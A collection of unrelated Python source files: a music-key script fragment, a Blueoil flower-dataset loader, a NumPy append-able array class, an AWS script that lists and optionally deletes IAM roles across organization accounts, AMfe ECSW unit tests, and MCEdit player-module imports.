posibles_tonos[-1]['modo'] = 'Locria VII (dism)'
posibles_tonos[-1]['escala'] = []
posibles_tonos[-1]['escala'].append(tono)
if (len(posibles_tonos)):
print '\nPosibles tonalidades:'
for index in range(0,len(posibles_tonos)):
print ' # Tonalidad', posibles_tonos[index]['modo']
print ' Escala', posibles_tonos[index]['escala']
else:
print '\nNo se han encontrado posibles tonos'
#for line in sys.stdin:
# print line
##############
#Main Program
##############
if __name__ == "__main__":
print '\n## Script started\n'
main()
print '\n## Script finished\n' |
# -*- coding: utf-8 -*-
# Copyright 2018 The Blueoil Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import functools
import json
import os.path
import numpy as np
import PIL.Image
import pandas as pd
from lmnet.datasets.base import ObjectDetectionBase
from lmnet.utils.random import shuffle, train_test_split
class LmFlower(ObjectDetectionBase):
"""Leapmind flower dataset for object detection.
images: images numpy array. shape is [batch_size, height, width]
labels: gt_boxes numpy array. shape is [batch_size, num_max_boxes, 5(x, y, w, h, class_id)]
"""
classes = ["sunflower", "calla", "poppy (Iceland poppy)", "carnation", "cosmos"]
num_classes = len(classes)
available_subsets = ["train", "validation"]
extend_dir = "lm_flower"
@classmethod
def count_max_boxes(cls):
"""Count max boxes size over all subsets."""
num_max_boxes = 0
for subset in cls.available_subsets:
obj = cls(subset=subset)
gt_boxes_list = obj.annotations
subset_max = max([len(gt_boxes) for gt_boxes in gt_boxes_list])
if subset_max >= num_max_boxes:
num_max_boxes = subset_max
return num_max_boxes
def __init__(
self,
*args,
**kwargs
):
super().__init__(
*args,
**kwargs,
)
self.json = os.path.join(self.data_dir, "project_126_1507252774.json")
self.images_dir = os.path.join(self.data_dir, "images")
self._init_files_and_annotations()
@property
def num_per_epoch(self):
return len(self.files)
def _element(self):
"""Return an image, gt_boxes."""
index = self.current_element_index
self.current_element_index += 1
if self.current_element_index == self.num_per_epoch:
self.current_element_index = 0
self._shuffle()
files, gt_boxes_list = self.files, self.annotations
target_file = files[index]
gt_boxes = gt_boxes_list[index]
gt_boxes = np.array(gt_boxes)
image = PIL.Image.open(target_file)
image = np.array(image)
samples = {'image': image, 'gt_boxes': gt_boxes}
if callable(self.augmentor) and self.subset == "train":
samples = self.augmentor(**samples)
if callable(self.pre_processor):
samples = self.pre_processor(**samples)
image = samples['image']
gt_boxes = samples['gt_boxes']
return image, gt_boxes
def _files_and_annotations_from_json(self, json_file):
"""Return files and gt_boxes list."""
image_ids = self._image_ids(json_file)
image_files = [self._image_file_from_image_id(json_file, image_id) for image_id in image_ids]
gt_boxes_list = [self._gt_boxes_from_image_id(json_file, image_id) for image_id in image_ids]
return image_files, gt_boxes_list
def _image_file_from_image_id(self, json_file, image_id):
images = self._images_from_json(json_file)
file_name = images[images.id == image_id].file_name.tolist()[0]
return os.path.join(self.images_dir, file_name)
def _gt_boxes_from_image_id(self, json_file, image_id):
annotations = self._annotations_from_json(json_file)
category_ids = annotations[annotations.image_id == image_id].category_id.tolist()
categories = self._categories_from_json(json_file)
category_names = [
categories[categories.id == category_id].name.iloc[0]
for category_id in category_ids
]
labels = [self.classes.index(category) for category in category_names]
bboxes = annotations[annotations.image_id == image_id].bbox.tolist()
gt_boxes = []
for class_id, bbox in zip(labels, bboxes):
# ignore width 0 or height 0 box.
if bbox[2] == 0 or bbox[3] == 0:
continue
gt_boxes.append(bbox + [class_id])
return gt_boxes
@functools.lru_cache(maxsize=None)
def _load_json(self, json_file):
f = open(json_file)
data = json.load(f)
f.close()
return data
def _image_ids(self, json_file):
images = self. _images_from_json(json_file)
return images.id.tolist()
@functools.lru_cache(maxsize=None)
def _annotations_from_json(self, json_file):
data = self._load_json(json_file)
annotations = pd.DataFrame(data["annotations"])
return annotations
@functools.lru_cache(maxsize=None)
def _categories_from_json(self, json_file):
data = self._load_json(json_file)
categories = pd.DataFrame(data["categories"])
return categories
@functools.lru_cache(maxsize=None)
def _images_from_json(self, json_file):
data = self._load_json(json_file)
images = pd.DataFrame(data["images"])
return images
@functools.lru_cache(maxsize=None)
def _files_and_annotations(self):
"""Return all files and labels list."""
single_split_rate = 0.1
files, labels = self._files_and_annotations_from_json(self.json)
train_files, test_files, train_labels, test_labels =\
train_test_split(files,
labels,
test_size=single_split_rate,
seed=1)
if self.subset == "train":
files = train_files
labels = train_labels
else:
files = test_files
labels = test_labels
print("files and annotations are ready")
return files, labels
@property
@functools.lru_cache(maxsize=None)
def num_max_boxes(self):
return type(self).count_max_boxes()
def feed(self):
"""Batch size numpy array of images and ground truth boxes.
Returns:
images: images numpy array. shape is [batch_size, height, width]
gt_boxes_list: gt_boxes numpy array. shape is [batch_size, num_max_boxes, 5(x, y, w, h, class_id)]
"""
images, gt_boxes_list = zip(*[self._element() for _ in range(self.batch_size)])
images = np.array(images)
gt_boxes_list = self._change_gt_boxes_shape(gt_boxes_list)
return images, gt_boxes_list
def _shuffle(self):
"""Shuffle data if train."""
if self.subset == "train":
self.files, self.annotations = shuffle(
self.files, self.annotations, seed=self.seed)
print("Shuffle {} train dataset with random state {}.".format(self.__class__.__name__, self.seed))
self.seed += 1
def _init_files_and_annotations(self):
self.files, self.annotations = self._files_and_annotations()
self._shuffle()
|
<reponame>vi-robotics/framegraph<gh_stars>0
from typing import Tuple, List, Union
from numbers import Number
import numpy as np
class NpArrayList():
"""A wrapper around an ndarray which provides an axis along the array
a constant time amortized append operation. The axis cannot be changed after
initialization.
"""
def __init__(self, data: np.ndarray, extend_axis: int = 0):
"""Initialize a NpArrayList with existing data.
Args:
data (np.ndarray): An ndarray to assign to 'data'.
extend_axis (int, optional): The axis of the ndarray along which
constant time append will be provided. Defaults to 0.
"""
self._extend_axis = extend_axis
self.data = data
self._virtual_axis_len = data.shape[extend_axis]
@property
def extend_axis(self) -> int:
"""The axis of the ndarray which supports constant time append.
Returns:
int: The extendable axis.
"""
return self._extend_axis
@extend_axis.setter
def extend_axis(self, axis: int):
"""Set the extend axis of the array.
Args:
axis (int): The extend axis of the array.
"""
if axis >= self._data.ndim:
raise ValueError(f"axis {axis} is not valid for data of shape"
f" {self.shape}")
self._extend_axis = axis
self._reset_data()
@property
def shape(self) -> Tuple[int, ...]:
"""The virtual shape of the data. This is "virtual" because the real
array behind the data is likely larger along extend_axis than the
virtual data.
Returns:
Tuple[int, ...]: The shape tuple of the array.
"""
res: List[int] = list(self._backed_shape)
res[self.extend_axis] = self._virtual_axis_len
return tuple(res)
@property
def size(self) -> int:
"""The virtual size of the array.
Returns:
int: The size of the array.
"""
return np.prod(self.shape)
@property
def data(self) -> np.ndarray:
"""The virtual data of the array.
Returns:
np.ndarray: The data.
"""
idx = [np.s_[:] for _ in self.shape]
idx[self.extend_axis] = np.s_[:self._virtual_axis_len]
return self._data[tuple(idx)]
@data.setter
def data(self, value: np.ndarray):
"""Set the virtual data of the array.
Args:
value (np.ndarray): The ndarray to set. The extend axis must be less
than the number of dimensions of the array.
Raises:
ValueError: Incompatible extend axis for array shape.
ValueError: Value is not an ndarray.
"""
if not isinstance(value, np.ndarray):
raise ValueError(f"value must be a ndarray, not {type(value)}")
if value.ndim <= self.extend_axis:
raise ValueError(f"extend_axis {self.extend_axis} is"
f" incompatible with shape {value.shape}")
self._virtual_axis_len = value.shape[self.extend_axis]
self._data: np.ndarray = value
def append(self, value: Union[Number, np.ndarray]):
"""Append the value to the end of the array (along the extend_axis).
Args:
value (Union[Number, np.ndarray]): The value must have the same
shape along every axis as data except extend_axis.
"""
if self._virtual_axis_len == self._backed_shape[self.extend_axis]:
self._grow_array()
self._data[self._get_current_idx()] = value
self._virtual_axis_len += 1
def _reset_data(self):
"""Reset the data such that the virtual data is the same as the backed
data.
"""
# This might look bizzare, but remember the data property returns the
# virtual data, and the setter sets the underlying data and handles
# adjusting the virtual length also! We also want to copy the data so
# that a view isn't made.
self.data = self.data.copy()
def _get_current_idx(self) -> Tuple[Union[int, slice], ...]:
"""Get the index tuple for the current 'append' slice of the array.
Returns:
Tuple[Union[int, slice], ...]: The resulting indexing tuple.
"""
idx: List[Union[int, slice]] = [np.s_[:] for _ in self.shape]
idx[self.extend_axis] = self._virtual_axis_len
return tuple(idx)
def _grow_array(self):
"""Grow the underlying array of the array list. This simply doubles the
length of the array along extend_axis.
"""
new_shape = list(self._backed_shape)
new_shape[self.extend_axis] *= 2
self._data.resize(new_shape, refcheck=False)
@property
def _backed_shape(self):
return self._data.shape
def __str__(self):
return self.data.__str__() # pragma: no cover
def __getitem__(self, val):
res_obj = self.data.__getitem__(val)
return self.__class__(res_obj, extend_axis=self.extend_axis)
|
#!/usr/bin/env python3
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import os, sys, pprint
from typing import List, Any
import Inventory_Modules, boto3
import argparse
from colorama import init, Fore, Back, Style
from botocore.exceptions import ClientError, NoCredentialsError, EndpointConnectionError
from urllib3.exceptions import NewConnectionError
import logging
init()
parser = argparse.ArgumentParser(
prefix_chars='-+/',
description="We're going to find all resources within any of the profiles we have access to.")
parser.add_argument(
"-p", "--profile",
dest="pProfile",
metavar="profile to use",
help="You need to specify a profile that represents the ROOT account.")
parser.add_argument(
"-r", "--role",
dest="pRole",
metavar="specific role to find",
default="",
help="Please specify the role you're searching for")
parser.add_argument(
"+d", "--delete",
dest="pDelete",
action="store_const",
const=True,
default=False,
help="Whether you'd like to delete that specified role.")
parser.add_argument(
'-v',
help="Be verbose",
action="store_const",
dest="loglevel",
const=logging.ERROR, # args.loglevel = 40
default=logging.CRITICAL) # args.loglevel = 50
parser.add_argument(
'-vv', '--verbose',
help="Be MORE verbose",
action="store_const",
dest="loglevel",
const=logging.WARNING, # args.loglevel = 30
default=logging.CRITICAL) # args.loglevel = 50
parser.add_argument(
'-vvv',
help="Print debugging statements",
action="store_const",
dest="loglevel",
const=logging.INFO, # args.loglevel = 20
default=logging.CRITICAL) # args.loglevel = 50
parser.add_argument(
'-d', '--debug',
help="Print LOTS of debugging statements",
action="store_const",
dest="loglevel",
const=logging.DEBUG, # args.loglevel = 10
default=logging.CRITICAL) # args.loglevel = 50
args = parser.parse_args()
pProfile = args.pProfile
pRole = args.pRole
pDelete = args.pDelete
logging.basicConfig(level=args.loglevel,
format="[%(filename)s:%(lineno)s:%(levelname)s - %(funcName)20s() ] %(""message)s")
##########################
ERASE_LINE = '\x1b[2K'
##########################
def delete_role(fRoleList):
iam_session = boto3.Session(
aws_access_key_id=fRoleList['aws_access_key_id'],
aws_secret_access_key=fRoleList['aws_secret_access_key'],
aws_session_token=fRoleList['aws_session_token'],
region_name='us-east-1')
iam_client = iam_session.client('iam')
try:
attached_role_policies = iam_client.list_attached_role_policies(
RoleName=fRoleList['RoleName']
)['AttachedPolicies']
for i in range(len(attached_role_policies)):
response = iam_client.detach_role_policy(
RoleName=fRoleList['RoleName'],
PolicyArn=attached_role_policies[i]['PolicyArn']
)
inline_role_policies = iam_client.list_role_policies(
RoleName=fRoleList['RoleName']
)['PolicyNames']
for i in range(len(inline_role_policies)):
response = iam_client.delete_role_policy(
RoleName=fRoleList['RoleName'],
PolicyName=inline_role_policies[i]['PolicyName']
)
response = iam_client.delete_role(
RoleName=fRoleList['RoleName']
)
return (True)
except ClientError as my_Error:
print(my_Error)
return (False)
ChildAccounts = Inventory_Modules.find_child_accounts2(pProfile)
print()
if not (pRole == ""):
print("Looking for a specific role called {}".format(pRole))
print()
fmt = '%-15s %-42s'
print(fmt % ("Account Number", "Role Name"))
print(fmt % ("--------------", "---------"))
Roles = []
SpecifiedRoleNum = 0
DeletedRoles = 0
for account in ChildAccounts:
try:
RoleNum = 0
account_credentials, role_arn = Inventory_Modules.get_child_access2(pProfile, account['AccountId'])
if role_arn.find("failed") > 0:
logging.error("Access to member account %s failed...", account['AccountId'])
continue
account_credentials['AccountId'] = account['AccountId']
logging.info("Connecting to %s with %s role", account['AccountId'], role_arn)
logging.info("Role ARN: %s" % role_arn)
print(ERASE_LINE,"Checking Account {}".format(account_credentials['AccountId']), end="")
except ClientError as my_Error:
if str(my_Error).find("AuthFailure") > 0:
print("{}: Authorization Failure for account {}".format(pProfile, account['AccountId']))
continue
iam_session = boto3.Session(
aws_access_key_id=account_credentials['AccessKeyId'],
aws_secret_access_key=account_credentials['SecretAccessKey'],
aws_session_token=account_credentials['SessionToken'],
region_name='us-east-1')
iam_client = iam_session.client('iam')
try:
response = iam_client.list_roles()
for i in range(len(response['Roles'])):
Roles.append({
'aws_access_key_id': account_credentials['AccessKeyId'],
'aws_secret_access_key': account_credentials['SecretAccessKey'],
'aws_session_token': account_credentials['SessionToken'],
'AccountId': account_credentials['AccountId'],
'RoleName': response['Roles'][i]['RoleName']
})
RoleNum=len(response['Roles'])
while response['IsTruncated']:
response = iam_client.list_roles(Marker=response['Marker'])
for i in range(len(response['Roles'])):
Roles.append({
'AccountId': account_credentials['AccountId'],
'RoleName': response['Roles'][i]['RoleName']
})
RoleNum+=len(response['Roles'])
print(" - Found {} roles".format(RoleNum), end="\r")
except ClientError as my_Error:
if str(my_Error).find("AuthFailure") > 0:
print(pProfile + ": Authorization Failure for account {}".format(account['AccountId']))
RoleNum=0
if (pRole == ""):
for i in range(len(Roles)):
print(fmt % (Roles[i]['AccountId'], Roles[i]['RoleName']))
RoleNum += 1
elif not (pRole == ""):
for i in range(len(Roles)):
RoleNum += 1
if Roles[i]['RoleName'] == pRole:
print(fmt % (Roles[i]['AccountId'], Roles[i]['RoleName']), end="")
SpecifiedRoleNum += 1
if pDelete:
delete_role(Roles[i])
print(" - deleted", end="")
DeletedRoles += 1
print()
print()
if (pRole == ""):
print("Found {} roles across {} accounts".format(RoleNum, len(ChildAccounts)))
else:
print("Found {} in {} of {} accounts".format(pRole, SpecifiedRoleNum, len(ChildAccounts)))
if pDelete:
print(" And we deleted it {} times".format(DeletedRoles))
print()
print("Thanks for using this script...")
print()
|
<reponame>ma-kast/AMfe
# Copyright (c) 2018, Lehrstuhl für Angewandte Mechanik, Technische Universität München.
#
# Distributed under BSD-3-Clause License. See LICENSE-File for more information
#
#
from unittest import TestCase
import numpy as np
from numpy.testing import assert_, assert_allclose, assert_array_equal
from numpy.linalg import norm
from amfe.mor.hyper_red.ecsw import sparse_nnls, ecsw_assemble_G_and_b, ecsw_get_weights_by_component
from amfe.mor.ui import create_ecsw_hyperreduced_component_from_weights
from amfe.io.tools import amfe_dir
from amfe.io.mesh.reader import GidJsonMeshReader
from amfe.io.mesh.writer import AmfeMeshConverter
from amfe.mor.hyper_red.ecsw_assembly import EcswAssembly
from amfe.assembly import StructuralAssembly
from amfe.component import StructuralComponent
from amfe.material import KirchhoffMaterial
class TestNnls(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_nnls(self):
# Copyright Notice:
# The Nnls testcase is a modified version of the nnls test case of the Scipy-package.
# This was distributed under BSD-3 License
# Copyright(c) 2001, 2002 Enthought, Inc.
# All rights reserved.
#
# Copyright (c) 2003-2019 SciPy Developers.
# All rights reserved.
#
# Author: <NAME>
# Sep 2008
#
# Build a matrix a
a = np.arange(25.0).reshape(-1, 5)
# Build a vector x
x = np.arange(5.0)
# Calculate the correct right hand side
y = np.dot(a, x)
# Calculate tau from residual tolerance tol = tau * norm(y)
tol = 1e-7
tau = tol/norm(y)
# run algorithm
x, stats = sparse_nnls(a, y, tau)
# get last residual before return
res = stats[-1][1]
# test if residual is smaller than desired tolerance
assert_(res <= tol)
assert_(norm(np.dot(a, x.toarray()).reshape(-1)-y) <= 1e-7)
# test if all x are greater equal zero
np.all(np.greater_equal(x.toarray(), 0.0))
# make a second test that does not converge
a = np.array([[0.21235441, 0.32701625, 0.67680346, 0.72724123, 0.51983536],
[0.82603172, 0.76654767, 0.69746447, 0.58220156, 0.2564705 ],
[0.04594648, 0.78409449, 0.85036132, 0.4888821 , 0.92390904],
[0.10404788, 0.37767343, 0.30689839, 0.77633873, 0.42464905],
[0.66897911, 0.59824198, 0.60212744, 0.02402656, 0.75641132]])
y = np.array([0., 0., 0., 0., 0.19731525])
tau = 1e-1/norm(y)
# this should not converge test if RuntimeError is raised
with self.assertRaises(RuntimeError):
sparse_nnls(a, y, tau)
class TestEcsw(TestCase):
def setUp(self):
# Define input file path
file = amfe_dir('tests/meshes/gid_json_4_tets.json')
# Define Reader Object, initialized with AmfeMeshConverter
reader = GidJsonMeshReader(file)
# Initialize component
converter = AmfeMeshConverter()
reader.parse(converter)
self.my_mesh = converter.return_mesh()
self.my_component = StructuralComponent(self.my_mesh)
my_material = KirchhoffMaterial()
self.my_component.assign_material(my_material, ['left', 'right'], 'S')
# Get number of dofs for snapshot generation
self.no_of_dofs = self.my_component.mapping.no_of_dofs
# create 2 random snapshots
self.no_of_snapshots = 2
self.S = np.random.rand(self.no_of_dofs, self.no_of_snapshots) * 0.05
self.W = np.eye(self.no_of_dofs)
self.timesteps = np.zeros(self.no_of_snapshots)
def tearDown(self):
pass
def test_assemble_g_b(self):
# store an example for f_int for later comparison to check if the old assembly is recovered
# after ecsw_assemble_G_and_b has finished
no_of_dofs = self.S.shape[0]
dq = ddq = np.zeros(no_of_dofs)
t = 0.0
f_old = self.my_component.f_int(self.S[:, 0], dq, t)
# run ecsw_assemble_G_and_b
G, b = ecsw_assemble_G_and_b(self.my_component, self.S, self.W, self.timesteps)
# test shape of G and b
no_of_elements = self.my_component.no_of_elements
self.assertEqual(G.shape, (self.no_of_dofs*self.no_of_snapshots, no_of_elements))
# ----------------------------------
# Check if G is correct
# Test first entry of G
g11_actual = G[0:self.no_of_dofs, 0]
connectivity = self.my_mesh.get_connectivity_by_elementids([1])[0]
X_local = self.my_mesh.nodes_df.loc[connectivity].values.reshape(-1)
u_local_indices = self.my_component.mapping.nodal2global.loc[connectivity].values.reshape(-1)
u_local = self.S[u_local_indices, 0]
fe_local = self.my_component.ele_obj[0].f_int(X_local, u_local)
global_dofs = self.my_component.mapping.elements2global[0]
g11_desired = np.zeros(self.no_of_dofs)
g11_desired[global_dofs] = fe_local
assert_allclose(g11_actual, g11_desired)
# Test second entry of G
g21_actual = G[self.no_of_dofs:, 0]
connectivity = self.my_mesh.get_connectivity_by_elementids([1])[0]
X_local = self.my_mesh.nodes_df.loc[connectivity].values.reshape(-1)
u_local_indices = self.my_component.mapping.nodal2global.loc[connectivity].values.reshape(-1)
u_local = self.S[u_local_indices, 1]
fe_local = self.my_component.ele_obj[0].f_int(X_local, u_local)
global_dofs = self.my_component.mapping.elements2global[0]
g21_desired = np.zeros(self.no_of_dofs)
g21_desired[global_dofs] = fe_local
assert_allclose(g21_actual, g21_desired)
# Test third entry of G
g12_actual = G[0:self.no_of_dofs, 1]
connectivity = self.my_mesh.get_connectivity_by_elementids([2])[0]
X_local = self.my_mesh.nodes_df.loc[connectivity].values.reshape(-1)
u_local_indices = self.my_component.mapping.nodal2global.loc[connectivity].values.reshape(-1)
u_local = self.S[u_local_indices, 0]
fe_local = self.my_component.ele_obj[1].f_int(X_local, u_local)
global_dofs = self.my_component.mapping.elements2global[1]
g12_desired = np.zeros(self.no_of_dofs)
g12_desired[global_dofs] = fe_local
assert_allclose(g12_actual, g12_desired)
# --------------------------------------
# check if b is correct:
b_desired = np.sum(G, 1)
assert_allclose(b, b_desired)
# --------------------------------------
# Check if old assembly is recovered
# get f_new for comparison to f_old
f_new = self.my_component.f_int(self.S[:, 0], dq, t)
# test if old assembly is recovered in the component
assert_allclose(f_new, f_old)
def test_reduce_with_ecsw(self):
# store old ids:
comp_id_old = id(self.my_component)
mesh_id_old = id(self.my_component.mesh)
# first mode: deepcopy
weights, indices, stats = ecsw_get_weights_by_component(self.my_component, self.S, self.W,
self.timesteps, tau=0.01)
ecsw_component = create_ecsw_hyperreduced_component_from_weights(self.my_component, weights, indices,
copymode='deep')
self.assertNotEqual(id(ecsw_component), comp_id_old)
self.assertNotEqual(id(ecsw_component.mesh), mesh_id_old)
self.assertIsInstance(ecsw_component.assembly, EcswAssembly)
# second mode: shallow
weights, indices, stats = ecsw_get_weights_by_component(self.my_component, self.S, self.W,
self.timesteps, tau=0.01)
ecsw_component = create_ecsw_hyperreduced_component_from_weights(self.my_component, weights, indices,
copymode='shallow')
self.assertNotEqual(id(ecsw_component), comp_id_old)
self.assertEqual(id(ecsw_component.mesh), mesh_id_old)
self.assertIsInstance(ecsw_component.assembly, EcswAssembly)
# third mode: overwrite
weights, indices, stats = ecsw_get_weights_by_component(self.my_component, self.S, self.W,
self.timesteps, tau=0.01)
ecsw_component = create_ecsw_hyperreduced_component_from_weights(self.my_component, weights, indices,
copymode='overwrite')
self.assertEqual(id(ecsw_component), comp_id_old)
self.assertEqual(id(ecsw_component.mesh), mesh_id_old)
self.assertIsInstance(ecsw_component.assembly, EcswAssembly)
# test wrong copymode
with self.assertRaises(ValueError):
weights, indices, stats = ecsw_get_weights_by_component(self.my_component, self.S, self.W,
self.timesteps, tau=0.01, conv_stats=False)
ecsw_component = create_ecsw_hyperreduced_component_from_weights(self.my_component, weights, indices,
copymode='foo')
# test if function with option stats = false is executable
weights, indices, stats = ecsw_get_weights_by_component(self.my_component, self.S, self.W,
self.timesteps, tau=0.01, conv_stats=False)
ecsw_component = create_ecsw_hyperreduced_component_from_weights(self.my_component, weights, indices)
self.assertIsInstance(ecsw_component.assembly, EcswAssembly)
class EcswTest(TestCase):
def setUp(self):
self.nodes = np.array([[0.0, 0.0], [1.0, 0.0], [1.0, 1.0], [0.0, 1.0]], dtype=np.float)
self.iconnectivity = [np.array([0, 1, 2], dtype=np.int), np.array([0, 2, 3], dtype=np.int),
np.array([1, 2], dtype=np.int), np.array([2, 3], dtype=np.int)]
self.asm = StructuralAssembly()
class DummyTri3Element:
def __init__(self):
pass
def m_int(self, X, u, t=0.):
M = np.array([[2, 0, -0.5, 0, -0.5, 0],
[0, 2, 0, -0.5, 0, -0.5],
[-0.5, 0, 2, 0, -0.5, 0],
[0, -0.5, 0, 2, 0, -0.5],
[-0.5, 0, -0.5, 0, 2, 0],
[0, -0.5, 0, -0.5, 0, 2]], dtype=float)
return M
def k_and_f_int(self, X, u, t=0.):
K = np.array([[4, -0.5, -0.5, -0.2, -0.5, -0.2],
[-0.2, 4, -0.2, -0.5, -0.2, -0.5],
[-0.5, -0.2, 4, -0.2, -0.5, -0.2],
[-0.2, -0.5, -0.2, 4, -0.2, -0.5],
[-0.5, -0.2, -0.5, -0.2, 4, -0.2],
[-0.2, -0.5, -0.2, -0.5, -0.2, 4]], dtype=float)
f = np.array([3, 1, 3, 1, 3, 1], dtype=float)
return K, f
def k_f_S_E_int(self, X, u, t=0):
K, f = self.k_and_f_int(X, u, t)
S = np.ones((3, 6), dtype=float)
E = 2*np.ones((3, 6), dtype=float)
return K, f, S, E
self.ele = DummyTri3Element()
def tearDown(self):
self.asm = None
def test_assemble_k_and_f_ecsw_test1(self):
weights = [5]
indices = np.array([1], dtype=int)
asm = EcswAssembly(weights, indices)
ele_obj = np.array([self.ele, self.ele], dtype=object)
element2dofs = np.array([np.array([0, 1, 2, 3, 4, 5], dtype=int), np.array([0, 1, 4, 5, 6, 7], dtype=int)])
K_global = asm.preallocate(8, element2dofs[indices])
f_global = np.zeros(K_global.shape[0])
memory_K_global_before = id(K_global)
memory_K_global_data_before = id(K_global.data)
memory_f_global_before = id(f_global)
dofvalues = np.array([0.0, 0.1, 0.2, 0.05, 0.0, 0.05, 0.02, 0.04])
asm.assemble_k_and_f(self.nodes, ele_obj, self.iconnectivity[0:2], element2dofs, dofvalues, K_csr=K_global, f_glob=f_global)
K_global_desired = np.zeros((8, 8), dtype=float)
f_global_desired = np.zeros(8, dtype=float)
# element 1
# Not assembled:
# K_global_desired[0:6, 0:6], f_global_desired[0:6] = self.ele.k_and_f_int(None, None)
# element 2
K_local, f_local = self.ele.k_and_f_int(None, None)
# diagonals
K_global_desired[0:2, 0:2] += weights[0]*K_local[0:2, 0:2]
K_global_desired[4:, 4:] += weights[0]*K_local[2:, 2:]
# off-diagonals
K_global_desired[0:2, 4:] += weights[0]*K_local[0:2, 2:]
K_global_desired[4:, 0:2] += weights[0]*K_local[2:, 0:2]
# f_int:
f_global_desired[0:2] += weights[0]*f_local[0:2]
f_global_desired[4:] += weights[0]*f_local[2:]
assert_array_equal(K_global.todense(), K_global_desired)
assert_array_equal(f_global, f_global_desired)
# Test if preallocation is working
memory_K_global_after = id(K_global)
memory_K_global_data_after = id(K_global.data)
memory_f_global_after = id(f_global)
self.assertTrue(memory_K_global_after == memory_K_global_before)
self.assertTrue(memory_K_global_data_after == memory_K_global_data_before)
self.assertTrue(memory_f_global_after == memory_f_global_before)
def test_assemble_k_and_f_ecsw_test2(self):
weights = np.array([5.0, 4.0])
indices = np.array([1, 0], dtype=int)
asm = EcswAssembly(weights, indices)
ele_obj = np.array([self.ele, self.ele], dtype=object)
element2dofs = np.array([np.array([0, 1, 2, 3, 4, 5], dtype=int), np.array([0, 1, 4, 5, 6, 7], dtype=int)])
K_global, f_global = asm.assemble_k_and_f(self.nodes, ele_obj, self.iconnectivity[0:2], element2dofs, K_csr=None,
f_glob=None)
K_global_desired = np.zeros((8, 8), dtype=float)
f_global_desired = np.zeros(8, dtype=float)
# element 0
K_global_desired[0:6, 0:6], f_global_desired[0:6] = self.ele.k_and_f_int(None, None)
K_global_desired[0:6, 0:6] = weights[1]*K_global_desired[0:6, 0:6]
f_global_desired[0:6] = weights[1]*f_global_desired[0:6]
# element 1
K_local, f_local = self.ele.k_and_f_int(None, None)
# diagonals
K_global_desired[0:2, 0:2] += weights[0]*K_local[0:2, 0:2]
K_global_desired[4:, 4:] += weights[0]*K_local[2:, 2:]
# off-diagonals
K_global_desired[0:2, 4:] += weights[0]*K_local[0:2, 2:]
K_global_desired[4:, 0:2] += weights[0]*K_local[2:, 0:2]
# f_int:
f_global_desired[0:2] += weights[0]*f_local[0:2]
f_global_desired[4:] += weights[0]*f_local[2:]
assert_array_equal(K_global.todense(), K_global_desired)
assert_array_equal(f_global, f_global_desired)
def test_assemble_k_f_S_E_ecsw(self):
weights = [5]
indices = np.array([1], dtype=int)
asm = EcswAssembly(weights, indices)
ele_obj = np.array([self.ele, self.ele], dtype=object)
element2dofs = [np.array([0, 1, 2, 3, 4, 5], dtype=int), np.array([0, 1, 4, 5, 6, 7], dtype=int)]
elements_on_node = np.array([weights[0], np.Inf, weights[0], weights[0]])
K_global = asm.preallocate(8, element2dofs)
f_global = np.zeros(K_global.shape[0])
memory_K_global_before = id(K_global)
memory_K_global_data_before = id(K_global.data)
memory_f_global_before = id(f_global)
K_global, f_global, S_global, E_global= asm.assemble_k_f_S_E(self.nodes, ele_obj, self.iconnectivity[0:2],
element2dofs, elements_on_node, K_csr=K_global, f_glob=f_global)
memory_K_global_after = id(K_global)
memory_K_global_data_after = id(K_global.data)
memory_f_global_after = id(f_global)
# test fully preallocated version
self.assertTrue(memory_K_global_after == memory_K_global_before)
self.assertTrue(memory_K_global_data_after == memory_K_global_data_before)
self.assertTrue(memory_f_global_after == memory_f_global_before)
K_global_desired = np.zeros((8, 8), dtype=float)
f_global_desired = np.zeros(8, dtype=float)
# element 1
# Not assembled:
# K_global_desired[0:6, 0:6], f_global_desired[0:6] = self.ele.k_and_f_int(None, None)
# element 2
K_local, f_local = self.ele.k_and_f_int(None, None)
# diagonals
K_global_desired[0:2, 0:2] += weights[0] * K_local[0:2, 0:2]
K_global_desired[4:, 4:] += weights[0] * K_local[2:, 2:]
# off-diagonals
K_global_desired[0:2, 4:] += weights[0] * K_local[0:2, 2:]
K_global_desired[4:, 0:2] += weights[0] * K_local[2:, 0:2]
# f_int:
f_global_desired[0:2] += weights[0] * f_local[0:2]
f_global_desired[4:] += weights[0] * f_local[2:]
assert_array_equal(K_global.todense(), K_global_desired)
assert_array_equal(f_global, f_global_desired)
S_global_desired = np.ones((4, 6))
E_global_desired = np.ones((4, 6))*2
# Set 2nd rows to zero as this node has no element in ecsw assembly:
S_global_desired[1, :] = 0.0
E_global_desired[1, :] = 0.0
assert_array_equal(K_global.todense(), K_global_desired)
assert_array_equal(f_global, f_global_desired)
assert_array_equal(S_global, S_global_desired)
assert_array_equal(E_global, E_global_desired)
|
"""
player
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import uuid
from PySide import QtGui
from PySide.QtCore import Qt
import itertools
from mcedit2.command import SimpleRevisionCommand
from mcedit2.ui.panels.player import Ui_playerWidget
from mcedit2.util.player_server import PlayerDataCache
from mceditlib.nbt import NBTFormatError
from mceditlib.util.lazyprop import weakrefprop
from mcedit2.util.screen import centerWidgetInScreen
